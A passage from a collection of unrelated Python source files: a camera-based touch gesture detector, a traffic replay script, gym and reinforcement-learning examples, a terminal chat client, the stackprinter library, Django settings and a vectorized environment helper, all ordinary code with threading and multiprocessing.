get_ellipse_id(self,ellipse_in,max_dist = 70): """ Get ellipse id. If has existing ellipse in history that's close enough, return that id. If not, get a new id. :param ellipse_in: single ellipse :param max_dist: upper bound for two positions to be considered the same ellipse :return: ellipse id """ xi,yi = ellipse_in[0] min_d = math.inf min_i = self.id for i,d in self.history.items(): x,y = d["history"][-1][0] dist = abs(xi-x)+abs(yi-y) if dist < max_dist and dist < min_d: min_d = dist min_i = i if min_i == self.id: self.id+=1 return min_i def gesture_detection_loop(): print("in gesture detector2") grayscale_threshold = 130 touch_detector = Touch_Detector(grayscale_threshold=grayscale_threshold, width_height_ratio_threshold=0.3, min_touch_area=500, max_touch_area=7000) def change_grayscale_threshold(x): touch_detector.grayscale_threshold = x def change_min_area_threshold(x): touch_detector.min_touch_area = x def change_max_area_threshold(x): touch_detector.max_touch_area = x # gesture_detector = Gesture_Detector() # camera_port = "out2.avi" camera_port = 1 camera = cv2.VideoCapture(camera_port) cv2.namedWindow('image') cv2.createTrackbar('GrayscaleMinValue', 'image', 0, 255, change_grayscale_threshold) cv2.setTrackbarPos('GrayscaleMinValue', 'image', grayscale_threshold) cv2.createTrackbar('Min Area', 'image', 10, 1000, change_min_area_threshold) cv2.setTrackbarPos('Min Area', 'image', 500) cv2.createTrackbar('Max Area', 'image', 10, 10000, change_max_area_threshold) cv2.setTrackbarPos('Max Area', 'image', 7000) gd2 = GD2() while True: ok, frame = camera.read() if ok: gray_frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) ellipses = touch_detector.get_touch_ellipses(gray_frame) gd2.add_ellipses(ellipses) gesture = gd2.detect_gesture(touch_detector.get_current_thresholded_image()) if gesture is not Gestures.NO_GESTURE: print(datetime.now(), gesture) rgb_frame = cv2.cvtColor(gray_frame, cv2.COLOR_GRAY2BGR) image = touch_detector.visualize(ellipses=ellipses, image=rgb_frame) cv2.imshow("image", image) cv2.moveWindow("image", 1, 1) cv2.waitKey(1)
RandomReplay.py
#!/bin/env python3 ''' ''' # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import socket import requests import os from threading import Thread import sys from multiprocessing import current_process import sessionvalidation.sessionvalidation as sv from collections import deque import collections import lib.result as result import extractHeader import mainProcess import json import gzip import NonSSL import SSLReplay import h2Replay import itertools import random bSTOP = False def session_replay(input, proxy, result_queue): global bSTOP ''' Replay all transactions in session This entire session will be replayed in one requests.Session (so one socket / TCP connection)''' # if timing_control: # time.sleep(float(session._timestamp)) # allow other threads to run while bSTOP == False: for session in iter(input.get, 'STOP'): # print(bSTOP) if session == 'STOP': print("Queue is empty") bSTOP = True break with requests.Session() as request_session: request_session.proxies = proxy for txn in session.getTransactionIter(): type = random.randint(1, 1000) try: if type % 3 == 0: NonSSL.txn_replay(session._filename, txn, proxy, result_queue, request_session) elif type % 3 == 1: SSLReplay.txn_replay(session._filename, txn, proxy, result_queue, request_session) elif type % 3 == 2: h2Replay.txn_replay(session._filename, txn, proxy, result_queue, request_session) except: e = sys.exc_info() print("ERROR in replaying: ", e, txn.getRequest().getHeaders()) bSTOP = True #print("Queue is empty") input.put('STOP') break def client_replay(input, proxy, result_queue, nThread): Threads = [] for i in range(nThread): t2 = Thread(target=SSLReplay.session_replay, args=[input, proxy, result_queue]) t = Thread(target=NonSSL.session_replay, args=[input, proxy, result_queue]) t1 = Thread(target=h2Replay.session_replay, args=[input, proxy, result_queue]) t2.start() t.start() t1.start() Threads.append(t) Threads.append(t2) Threads.append(t1) for t1 in Threads: t1.join()
multi_gym_example.py
#!/usr/bin/env python3 import gym import numpy as np import ffai from multiprocessing import Process, Pipe from ffai.ai.renderer import Renderer def worker(remote, parent_remote, env): parent_remote.close() # Get observations space (layer, height, width) obs_space = env.observation_space # Get action space act_space = env.action_space # Create random state for action selection seed = env.get_seed() rnd = np.random.RandomState(seed) # Play 10 games steps = 0 # Reset environment obs = env.reset() while True: command = remote.recv() if command == 'step': # Sample random action type action_types = env.available_action_types() action_type = rnd.choice(action_types) # Sample random position - if any available_positions = env.available_positions(action_type) pos = rnd.choice(available_positions) if len(available_positions) > 0 else None # Create action object action = { 'action-type': action_type, 'x': pos.x if pos is not None else None, 'y': pos.y if pos is not None else None } # Gym step function obs, reward, done, info = env.step(action) steps += 1 # Render # Currently crashes on mac python 3.7.4 # env.render(feature_layers=False) if done: obs = env.reset() remote.send((obs, reward, done, info)) elif command == 'reset': # Reset environment obs = env.reset() done = False elif command == 'close': # Close environment env.close() break if __name__ == "__main__": renderer = Renderer() nenvs = 8 envs = [gym.make("FFAI-3-v1") for _ in range(nenvs)] for i in range(len(envs)): envs[i].seed() remotes, work_remotes = zip(*[Pipe() for _ in range(nenvs)]) ps = [Process(target=worker, args=(work_remote, remote, env)) for (work_remote, remote, env) in zip(work_remotes, remotes, envs)] for p in ps: p.daemon = True # If the main process crashes, we should not cause things to hang p.start() for remote in work_remotes: remote.close() for i in range(10): print(i) for remote in remotes: remote.send('step') results = [remote.recv() for remote in remotes] for j in range(len(results)): obs, reward, done, info = results[j] # Currently crashes on mac python 3.7.4 # renderer.render(obs, j) for remote in remotes: remote.send('close') for p in ps: p.join()
events.py
# Copyright 2022 iiPython # Modules import os import time import tempfile from copy import copy from typing import Tuple from threading import Thread from datetime import datetime from types import FunctionType from iipython import keys, readchar, clear, color, Socket from .config import config from .themes import ThemeManager from .plugins import PluginManager try: from src.vendor.termimg.image import TermImage except ImportError: TermImage = None # Initialization def scale_bytes(size: int) -> str: for unit in ["", "K", "M", "G"]: if abs(size) < 1024: return f"{size:3.1f}{unit}B" size /= 1024 return f"{size:.1f}TB" def truncate(text: str, length: int) -> str: oldlen, text = len(text), text[:length] if len(text) != oldlen: text += "..." return text # Context class EventContext(object): def __init__(self, data: dict, in_history: bool = False) -> None: self.raw = data self.type = data["type"] self.data = data["data"] self.server = data["server"] self.timestamp = data["ts"] self.in_history = in_history # Event Manager class EventManager(object): def __init__(self) -> None: self.sock, self.pluginmgr = None, None self.events, self.themes = {}, ThemeManager() # Shared data (for use by plugins) self.shared = {"input": "", "spacer": " " * os.get_terminal_size()[0], "history": [], "config": config} # Formatters self.data_formatters = { "m.msg": lambda d: (d.data["author"]["username"], self.pluginmgr.on_msg(d.data["content"])), "m.bin": self.format_bin, "u.join": lambda d: ("System", f"[blue]{d.data['username']} [green]has joined the server."), "u.leave": lambda d: ("System", f"[blue]{d.data['username']} [red]has left the server.") } self.time_formatters = { "12h": lambda ts: datetime.fromtimestamp(ts).strftime("%I:%M %p"), "24h": lambda ts: datetime.fromtimestamp(ts).strftime("%H:%M"), "utc12h": lambda ts: datetime.utcfromtimestamp(ts).strftime("%I:%M %p"), "utc24h": lambda ts: datetime.utcfromtimestamp(ts).strftime("%H:%M") } def format_bin(self, d: EventContext) -> tuple: def print_image(data: EventContext) -> None: file = tempfile.NamedTemporaryFile(delete = False, suffix = "." + d.data["filename"].split(".")[-1]) file.write(bytes.fromhex(data.data["binary"])) d.data["content"] = str(TermImage.from_file(file.name)) d.type = "m.msg" self.print_event(d) try: os.remove(file.name) except Exception: pass if d.data["filename"].split(".")[-1] in ["png", "jpg", "jpeg", "ico"] and TermImage is not None and not d.in_history: self.hook_event("onimagerecv", print_image) self.sock.sendjson({"type": "d.file", "data": {"id": d.data["id"], "callback": "onimagerecv"}}) return ( d.data["author"]["username"], f"{truncate(d.data['filename'], 16)} ({scale_bytes(d.data['size'])})\nDownload with [yellow]/files down {d.data['id']}[/]" ) def send_loop(self) -> None: history = {"entries": [], "index": -1, "store": None} while True: render = f"{color(self.themes.data['prompt'])}{self.shared['input']}" if len(render) == len(self.shared["spacer"]): self.shared["input"] = self.shared["input"][:-1] if self.shared["input"].startswith("/"): hint_guess = None guesses = sorted([p for p in self.pluginmgr.plugins if p.startswith(self.shared["input"][1:].split(" ")[0])], key = len) if guesses: if " " not in self.shared["input"]: render += color(f"[lblack]{guesses[0][len(self.shared['input']) - 1:]}") elif self.shared["input"].count(" ") == 1: last = self.shared["input"].split(" ")[1] hint_guess = sorted([h for h in self.pluginmgr.plugins[guesses[0]]["hints"] if h.startswith(last)], key = len) if hint_guess: render += color(f"[lblack]{hint_guess[0][len(last):]}") if self.shared["input"].count(" ") > 1: guesses = None print(f"\r{self.shared['spacer']}\r{render}", end = "") # Keypress handler kp = readchar() if kp in ["\t", 9] and self.shared["input"].startswith("/"): # 9 = tab on windows if not guesses: continue elif hint_guess is not None: if hint_guess: self.shared["input"] = " ".join(self.shared["input"].split(" ")[:-1] + [hint_guess[0]]) else: self.shared["input"] = "/" + guesses[0] elif isinstance(kp, str): self.shared["input"] += kp history["index"] = -1 history["store"] = None elif kp == keys.ENTER and self.shared["input"]: history_entry = copy(self.shared["input"]) if self.shared["input"][0] == "/": data = self.shared["input"][1:].split(" ")[0] if data in self.pluginmgr.plugins.keys(): self.shared["input"] = self.pluginmgr.on_call(self.shared["input"]) if self.shared["input"] is not None: self.sock.sendjson({"type": "m.msg", "data": {"content": self.shared["input"]}}) history["entries"] = [history_entry] + history["entries"] self.shared["input"] = "" elif kp == keys.UP: if history["store"] is None: history["store"] = copy(self.shared["input"]) try: history["index"] += 1 self.shared["input"] = history["entries"][history["index"]] except IndexError: history["index"] -= 1 elif kp == keys.DOWN: history["index"] -= 1 if history["index"] < 0: if history["store"] is not None: self.shared["input"] = copy(history["store"]) history["store"], history["index"] = None, -1 continue self.shared["input"] = history["entries"][history["index"]] elif kp == keys.BACKSPACE and self.shared["input"]: self.shared["input"] = self.shared["input"][:-1] elif kp == keys.CTRL_C: os._exit(0) # We need to stop the receive process def loop_recv(self, conn: Socket) -> None: self.sock = conn Thread(target = self.send_loop).start() clear() self.pluginmgr = PluginManager(self) # Receive loop while True: for event in conn.recvjson(): event = EventContext(event) self.shared["server"] = event.server if event.type[0] == "e": self.print_event(event, ("System", "[red]" + event.data["error"])) continue elif event.type == "m.history": if config.data.get("show_history", True): for item in event.data["items"]: self.print_event(EventContext(item, in_history = True)) self.print_event(EventContext({ "type": "m.msg", "data": { "author": {"username": "System"}, "content": f"[lblue]Welcome to [yellow]{event.data['items'][-1]['server']['name']}[/].[/]" }, "ts": time.time(), "server": event.data["items"][-1]["server"] })) continue elif "callback" in event.data: cb = event.data["callback"] if cb in self.events: self.events[cb](event) del self.events[cb] continue self.print_event(event) def hook_event(self, event: str, callback: FunctionType) -> None: self.events[event] = callback def print_line(self, text: str) -> None: print(color(f"\r{self.shared['spacer']}\r{text}[bgreset][reset]") + "\n\r" + color(self.themes.data["prompt"]) + self.shared["input"], end = "") def print_event(self, data: EventContext, body_data: Tuple[str, str] = None) -> None: if data.type in self.data_formatters and body_data is None: body_data = self.data_formatters[data.type](data) dt = self.time_formatters.get(config.data.get("time_format", "12h"), self.time_formatters["12h"])(data.timestamp) prefix = f"[{self.themes.elems['time']}]{dt}[/] [{self.themes.elems['name']}]{body_data[0]}[/] " for i, line in enumerate(body_data[1].split("\n")): body = f"{prefix if not i else ' ' * len(color(prefix, dry = True))}[{self.themes.elems['sep']}]|[/] {color(line)}" self.print_line(body)
enjoy_tmax.py
import random import sys import time from collections import deque from threading import Thread import cv2 import numpy as np from pynput.keyboard import Key, Listener, KeyCode from algorithms.utils.algo_utils import main_observation, goal_observation, EPS from algorithms.utils.env_wrappers import reset_with_info from algorithms.tmax.agent_tmax import AgentTMAX from algorithms.tmax.tmax_utils import parse_args_tmax, TmaxMode from algorithms.topological_maps.topological_map import TopologicalMap from utils.envs.atari import atari_utils from utils.envs.doom import doom_utils from utils.envs.envs import create_env from utils.timing import Timing from utils.utils import log, min_with_idx class PolicyType: RANDOM, AGENT, LOCOMOTION, PLAYER = range(4) KEY_CHARS = {RANDOM: 'r', AGENT: 'a', LOCOMOTION: 'l', PLAYER: 'p'} KEYS = {t: KeyCode.from_char(c) for t, c in KEY_CHARS.items()} persistent_map = None current_landmark = None pause = False terminate = False policy_type = PolicyType.AGENT current_actions = [] key_to_action = None # noinspection PyCallingNonCallable def on_press(key): if key == Key.esc: global terminate terminate = True return False global pause if key == Key.pause: pause = not pause global current_actions action = key_to_action(key) if action is not None: if action not in current_actions: current_actions.append(action) global policy_type for t, k in PolicyType.KEYS.items(): if key == k: policy_type = t log.info('Switch to policy %d (%r)', t, k) # noinspection PyCallingNonCallable def on_release(key): global current_actions action = key_to_action(key) if action is not None: if action in current_actions: current_actions.remove(action) last_distances = deque([], maxlen=200) def calc_distance_to_memory(agent, sparse_map, obs): distance_net = agent.curiosity.distance num_landmarks = sparse_map.num_landmarks() curr_obs = [obs] * num_landmarks map_obs = [sparse_map.get_observation(node) for node in sparse_map.graph.nodes] distances = distance_net.distances_from_obs( agent.session, obs_first=map_obs, obs_second=curr_obs, ) min_d, min_d_idx = min_with_idx(distances) global last_distances last_distances.append(min_d) # log.info('Avg.distance: %.3f', np.mean(last_distances)) log.info('Curr.distance: %.3f', min_d) import cv2 closest_node = list(sparse_map.graph.nodes)[min_d_idx] closest_obs = sparse_map.get_observation(closest_node) cv2.imshow('closest_obs', cv2.resize(cv2.cvtColor(closest_obs, cv2.COLOR_RGB2BGR), (420, 420))) cv2.waitKey(1) def calc_value_estimate(agent, obs): _, _, values = agent.actor_critic.invoke( agent.session, [obs], None, None, None, [1.0], ) value = values[0] log.info('Current value estimate is %.3f', value) def enjoy(params, env_id, max_num_episodes=1000, max_num_frames=None, show_automap=False): def make_env_func(): e = create_env(env_id, mode='test', show_automap=show_automap) e.seed(0) return e params = params.load() params.num_envs = 1 # during execution we're only using one env agent = AgentTMAX(make_env_func, params) env = make_env_func() agent.initialize() global persistent_map if agent.params.persistent_map_checkpoint is not None: persistent_map = TopologicalMap.create_empty() persistent_map.maybe_load_checkpoint(agent.params.persistent_map_checkpoint) global current_landmark episode_rewards = [] num_frames = 0 def max_frames_reached(frames): return max_num_frames is not None and frames > max_num_frames for _ in range(max_num_episodes): env_obs, info = reset_with_info(env) done = False obs, goal_obs = main_observation(env_obs), goal_observation(env_obs) prev_obs = obs if current_landmark is None: current_landmark = obs if goal_obs is not None: goal_obs_rgb = cv2.cvtColor(goal_obs, cv2.COLOR_BGR2RGB) cv2.imshow('goal', cv2.resize(goal_obs_rgb, (500, 500))) cv2.waitKey(500) episode_reward, episode_frames = 0, 0 if not agent.tmax_mgr.initialized: agent.tmax_mgr.initialize([obs], [info], env_steps=0) persistent_map = agent.tmax_mgr.dense_persistent_maps[-1] sparse_persistent_map = agent.tmax_mgr.sparse_persistent_maps[-1] log.debug('Num landmarks in sparse map: %d', sparse_persistent_map.num_landmarks()) agent.curiosity.initialized = True agent.tmax_mgr.mode[0] = TmaxMode.EXPLORATION agent.tmax_mgr.locomotion_final_targets[0] = None agent.tmax_mgr.locomotion_targets[0] = None start_episode = time.time() t = Timing() while not done and not terminate and not max_frames_reached(num_frames): with t.timeit('one_frame'): env.render() cv2.waitKey(1) # to prevent window from fading if pause: time.sleep(0.01) continue if len(current_actions) > 0: # key combinations are not handled, but this is purely for testing action = current_actions[-1] else: action = 0 if policy_type == PolicyType.PLAYER: pass elif policy_type == PolicyType.RANDOM: action = env.action_space.sample() elif policy_type == PolicyType.AGENT: agent.tmax_mgr.mode[0] = TmaxMode.EXPLORATION action, *_ = agent.policy_step([prev_obs], [obs], [goal_obs], None, None) action = action[0] elif policy_type == PolicyType.LOCOMOTION: agent.tmax_mgr.mode[0] = TmaxMode.LOCOMOTION action, _, _ = agent.loco_actor_critic.invoke( agent.session, [obs], [current_landmark], None, None, [1.0], ) action = action[0] env_obs, rew, done, info = env.step(action) next_obs, goal_obs = main_observation(env_obs), goal_observation(env_obs) _, _ = agent.tmax_mgr.update( [obs], [next_obs], [rew], [done], [info], num_frames, t, verbose=True, ) prev_obs = obs obs = next_obs calc_distance_to_memory(agent, sparse_persistent_map, obs) calc_value_estimate(agent, obs) episode_reward += rew num_frames += 1 episode_frames += 1 took_seconds = t.one_frame desired_fps = 15 # (4-repeated here, which means actually 60fps) wait_seconds = (1.0 / desired_fps) - took_seconds wait_seconds = max(0.0, wait_seconds) if wait_seconds > EPS: time.sleep(wait_seconds) env.render() log.info('Actual fps: %.1f', episode_frames / (time.time() - start_episode)) time.sleep(0.2) episode_rewards.append(episode_reward) last_episodes = episode_rewards[-100:] avg_reward = sum(last_episodes) / len(last_episodes) log.info( 'Episode reward: %f, avg reward for %d episodes: %f', episode_reward, len(last_episodes), avg_reward, ) if max_frames_reached(num_frames) or terminate: break agent.finalize() env.close() cv2.destroyAllWindows() return 0 def main(): args, params = parse_args_tmax(AgentTMAX.Params) env_id = args.env global key_to_action if 'dmlab' in env_id: from utils.envs.dmlab import play_dmlab key_to_action = play_dmlab.key_to_action elif 'atari' in env_id: key_to_action = atari_utils.key_to_action elif 'doom' in env_id: key_to_action = doom_utils.key_to_action else: raise Exception('Unknown env') try: show_map = args.show_automap except AttributeError: show_map = False # start keypress listener (to pause/resume execution or exit) def start_listener(): with Listener(on_press=on_press, on_release=on_release) as listener: listener.join() listener_thread = Thread(target=start_listener) listener_thread.start() status = enjoy(params, args.env, show_automap=show_map) log.debug('Press ESC to exit...') listener_thread.join() return status if __name__ == '__main__': sys.exit(main())
__init__.py
import sys import types import warnings from threading import Thread from functools import wraps import stackprinter.formatting as fmt from stackprinter.tracing import TracePrinter, trace def _guess_thing(f): """ default to the current exception or current stack frame""" # the only reason this happens up here is to keep sys._getframe at the same # call depth relative to an invocation of `show` or `format`, even when # `format` is called _by_ `show`. @wraps(f) def show_or_format(thing=None, *args, **kwargs): if thing is None: thing = sys.exc_info() if thing == (None, None, None): thing = sys._getframe(1) return f(thing, *args, **kwargs) return show_or_format @_guess_thing def format(thing=None, **kwargs): """ Render the traceback of an exception or a frame's call stack Call this without arguments inside an `except` block to get a traceback for the currently handled exception: ``` try: something() except: logger.err(stackprinter.format(**kwargs)) ``` Explicitly pass an exception (or a triple as returned by `sys.exc_info()`) to handle that particular exception anywhere, also outside an except block. ``` try: something() except Exception as e: last_exc = e if last_exc: logger.err(stackprinter.format(last_exc, **kwargs)) ``` Pass a frame object to see the call stack leading up to that frame: ``` stack = stackprinter.format(sys._getframe(2), **kwargs)) ``` Pass a thread object to see its current call stack: ``` thread = threading.Thread(target=something) thread.start() # (...) stack = stackprinter.format(thread, **kwargs)) ``` Note: This displays variable values as they are _at the time of formatting_. In multi-threaded programs, variables can change while we're busy walking the stack & printing them. So, if nothing seems to make sense, consider that your exception and the traceback messages are from slightly different times. Sadly, there is no responsible way to freeze all other threads as soon as we want to inspect some thread's call stack (...or is there?) Params --- thing: (optional) exception, sys.exc_info() tuple, frame or thread What to format. Defaults to the currently handled exception or current stack frame. style: string 'plaintext' (default): Output just text 'darkbg', 'darkbg2', 'darkbg3', 'lightbg', 'lightbg2', 'lightbg3': Enable colors, for use in terminals that support 256 ansi colors or in jupyter notebooks (or even with `ansi2html`) source_lines: int or 'all' Select how much source code context will be shown. int 0: Don't include a source listing. int n > 0: Show n lines of code. (default: 5) string 'all': Show the whole scope of the frame. show_signature: bool (default True) Always include the function header in the source code listing. show_vals: str or None Select which variable values will be shown. 'line': Show only the variables on the highlighted line. 'like_source' (default): Show only those visible in the source listing 'all': Show every variable in the scope of the frame. None: Don't show any variable values. truncate_vals: int Maximum number of characters to be used for each variable value. Default: 500 line_wrap: int (default 60) Limit how many columns are available to print each variable (excluding its name). Set to 0 or False to disable wrapping. suppressed_paths: list of regex patterns Set less verbose formatting for frames whose code lives in certain paths (e.g. library code). Files whose path matches any of the given regex patterns will be considered boring. The first call to boring code is rendered with fewer code lines (but with argument values still visible), while deeper calls within boring code get a single line and no variable values. Example: To hide numpy internals from the traceback, set `suppressed_paths=[r"lib/python.*/site-packages/numpy"]` or `suppressed_paths=[re.compile(r"lib/python.*/site-packages/numpy")]` suppressed_exception_types: list of exception classes Show less verbose formatting for exceptions in this list. By default, this list is `[KeyboardInterrupt]`. Set to `[]` to force verbose formatting even on a keyboard interrupt. reverse: bool List the innermost frame first. add_summary: True, False, 'auto' Append a compact list of involved files and source lines, similar to the built-in traceback message. 'auto' (default): do that if the main traceback is longer than 50 lines. """ if isinstance(thing, types.FrameType): return fmt.format_stack_from_frame(thing, **kwargs) elif isinstance(thing, Thread): return format_thread(thing, **kwargs) elif isinstance(thing, Exception): exc_info = (thing.__class__, thing, thing.__traceback__) return format(exc_info, **kwargs) elif _is_exc_info(thing): return fmt.format_exc_info(*thing, **kwargs) else: raise ValueError("Can't format %s. "\ "Expected an exception instance, sys.exc_info() tuple,"\ "a frame or a thread object." % repr(thing)) @_guess_thing def show(thing=None, file='stderr', **kwargs): """ Print the traceback of an exception or a frame's call stack Params --- file: 'stderr', 'stdout' or file-like object defaults to stderr **kwargs: See `format` """ if file == 'stderr': file = sys.stderr elif file == 'stdout': file = sys.stdout print(format(thing, **kwargs), file=file) def format_current_stack(**kwargs): """ Render the current thread's call stack. Params -- **kwargs: See `format` """ return format(sys._getframe(1), **kwargs) def show_current_stack(**kwargs): """ Print the current thread's call stack. Params -- **kwargs: See `show` """ show(sys._getframe(1), **kwargs) def format_current_exception(**kwargs): """ Render a traceback for the currently handled exception. Params -- **kwargs: See `format` """ return format(sys.exc_info(), **kwargs) def show_current_exception(file=sys.stderr, **kwargs): """ Print a traceback for the currently handled exception. Params -- **kwargs: See `show` """ print(format_current_exception(**kwargs), file=file) def set_excepthook(**kwargs): """ Set sys.excepthook to print a detailed traceback for any uncaught exception. See `format()` for available kwargs. Examples: ---- Print to stdout instead of stderr: ``` set_excepthook(file='stdout') ``` Enable color output: ``` set_excepthook(style='darkbg') # or e.g. 'lightbg' (for more options see `format`) ``` If running under Ipython, this will, with a heavy heart, attempt to monkey patch Ipython's traceback printer (which handles all exceptions internally, thus bypassing the system excepthook). You can decide whether this sounds like a sane idea. To undo, call `remove_excepthook`. Params -- **kwargs: See `show` and `format` """ if _is_running_in_ipython(): _patch_ipython_excepthook(**kwargs) else: def hook(*args): show(args, **kwargs) sys.excepthook = hook def remove_excepthook(): """ Reinstate the default excepthook """ if _is_running_in_ipython(): _unpatch_ipython_excepthook() sys.excepthook = sys.__excepthook__ def _is_running_in_ipython(): try: return __IPYTHON__ except NameError: return False ipy_tb = None def _patch_ipython_excepthook(**kwargs): """ Replace ipython's built-in traceback printer, excellent though it is""" global ipy_tb blacklist = kwargs.get('suppressed_paths', []) blacklist.append('site-packages/IPython/') kwargs['suppressed_paths'] = blacklist if 'file' in kwargs: del kwargs['file'] def format_tb(*exc_tuple, **__): unstructured_tb = format(exc_tuple, **kwargs) structured_tb = [unstructured_tb] # \*coughs* return structured_tb import IPython shell = IPython.get_ipython() if ipy_tb is None: ipy_tb = shell.InteractiveTB.structured_traceback shell.InteractiveTB.structured_traceback = format_tb def _unpatch_ipython_excepthook(): """ restore proper order in Ipython """ import IPython shell = IPython.get_ipython() if ipy_tb is not None: shell.InteractiveTB.structured_traceback = ipy_tb def _is_exc_info(thing): if not isinstance(thing, tuple) or len(thing) != 3: return False a, b, c = thing return ((a is None or (isinstance(a, type) and BaseException in a.mro())) and (b is None or (isinstance(b, BaseException)))) def format_thread(thread, add_summary=False, **kwargs): try: fr = sys._current_frames()[thread.ident] except KeyError: return "%r: no frames found" % thread else: if 'suppressed_paths' not in kwargs: kwargs['suppressed_paths'] = [] kwargs['suppressed_paths'] += [r"lib/python.*/threading\.py"] msg = fmt.format_stack_from_frame(fr, **kwargs) msg_indented = ' ' + '\n '.join(msg.split('\n')).strip() return "%r\n\n%s" % (thread, msg_indented)
settings_20210906111205.py
""" Django settings for First_Wish project. Generated by 'django-admin startproject' using Django 3.2. For more information on this file, see https://docs.djangoproject.com/en/3.2/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/3.2/ref/settings/ """ from pathlib import Path import os import environ import threading import schedule import time from First_Wish_Main_App.views import decrease_day_count_and_send_bday_mails env_path = os.path.join(os.path.dirname(__file__), '../.env') environ.Env.read_env(env_path) # schedule.every().day.at("11:00").do(decrease_day_count_and_send_bday_mails) # ///////////////////////////////SCHEDULE THE ENABLE BUTTON STARTS//////////////////// # Schedule the task at 00:01 everyday def sayHi(): print("Hi") schedule.every().day.at("11:13").do(sayHi) # schedule.every().day.at("01:00").do(delete_task_and_add_store_datewise) def func(): while True: print("======Runnning==========") schedule.run_pending() time.sleep(1) t1 = threading.Thread(target=func) t1.start() # ///////////////////////////////SCHEDULE THE ENABLE BUTTON ENDS//////////////////// # Build paths inside the project like this: BASE_DIR / 'subdir'. BASE_DIR = Path(__file__).resolve().parent.parent templates_path=os.path.join(BASE_DIR,'templates') # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/3.2/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY =os.environ.get('DJANGO_SECRET_KEY') # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True ALLOWED_HOSTS = [] # Application definition INSTALLED_APPS = [ 'First_Wish_Main_App', 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', ] MIDDLEWARE = [ 'django.middleware.security.SecurityMiddleware', 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', 'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ] ROOT_URLCONF = 'First_Wish.urls' TEMPLATES = [ { 'BACKEND': 'django.template.backends.django.DjangoTemplates', 'DIRS': [templates_path], 'APP_DIRS': True, 'OPTIONS': { 'context_processors': [ 'django.template.context_processors.debug', 'django.template.context_processors.request', 'django.contrib.auth.context_processors.auth', 'django.contrib.messages.context_processors.messages', ], }, }, ] WSGI_APPLICATION = 'First_Wish.wsgi.application' # Database # https://docs.djangoproject.com/en/3.2/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': BASE_DIR / 'db.sqlite3', } } # Password validation # https://docs.djangoproject.com/en/3.2/ref/settings/#auth-password-validators AUTH_PASSWORD_VALIDATORS = [ { 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', }, { 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', }, { 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', }, { 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', }, ] # Internationalization # https://docs.djangoproject.com/en/3.2/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/3.2/howto/static-files/ STATIC_URL = '/static/' # Default primary key field type # https://docs.djangoproject.com/en/3.2/ref/settings/#default-auto-field DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField' STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles') STATICFILES_DIRS = [ os.path.join(BASE_DIR, "static"), ]
multiprocessing_env.py
#This code is from openai baseline #https://github.com/openai/baselines/tree/master/baselines/common/vec_env import numpy as np from multiprocessing import Process, Pipe def worker(remote, parent_remote, env_fn_wrapper): parent_remote.close() env = env_fn_wrapper.x() while True: cmd, data = remote.recv() if cmd == 'step': ob, reward, done, info = env.step(data) if done: ob = env.reset() remote.send((ob, reward, done, info)) elif cmd == 'reset': ob = env.reset() remote.send(ob) elif cmd == 'reset_task': ob = env.reset_task() remote.send(ob) elif cmd == 'close': remote.close() break elif cmd == 'get_spaces': remote.send((env.observation_space, env.action_space)) else: raise NotImplementedError class VecEnv(object): """ An abstract asynchronous, vectorized environment. """ def __init__(self, num_envs, observation_space, action_space): self.num_envs = num_envs self.observation_space = observation_space self.action_space = action_space def reset(self): """ Reset all the environments and return an array of observations, or a tuple of observation arrays. If step_async is still doing work, that work will be cancelled and step_wait() should not be called until step_async() is invoked again. """ pass def step_async(self, actions): """ Tell all the environments to start taking a step with the given actions. Call step_wait() to get the results of the step. You should not call this if a step_async run is already pending. """ pass def step_wait(self): """ Wait for the step taken with step_async(). Returns (obs, rews, dones, infos): - obs: an array of observations, or a tuple of arrays of observations. - rews: an array of rewards - dones: an array of "episode done" booleans - infos: a sequence of info objects """ pass def close(self): """ Clean up the environments' resources. """ pass def step(self, actions): self.step_async(actions) return self.step_wait() class CloudpickleWrapper(object): """ Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle) """ def __init__(self, x): self.x = x def __getstate__(self): import cloudpickle return cloudpickle.dumps(self.x) def __setstate__(self, ob): import pickle self.x = pickle.loads(ob) class SubprocVecEnv(VecEnv): def __init__(self, env_fns, spaces=None): """ envs: list of gym environments to run in subprocesses """ self.waiting = False self.closed = False nenvs = len(env_fns) self.nenvs = nenvs self.remotes, self.work_remotes = zip(*[Pipe() for _ in range(nenvs)]) self.ps = [Process(target=worker, args=(work_remote, remote, CloudpickleWrapper(env_fn))) for (work_remote, remote, env_fn) in zip(self.work_remotes, self.remotes, env_fns)] for p in self.ps: p.daemon = True # if the main process crashes, we should not cause things to hang p.start() for remote in self.work_remotes: remote.close() self.remotes[0].send(('get_spaces', None)) observation_space, action_space = self.remotes[0].recv() VecEnv.__init__(self, len(env_fns), observation_space, action_space) def step_async(self, actions): for remote, action in zip(self.remotes, actions): remote.send(('step', action)) self.waiting = True def 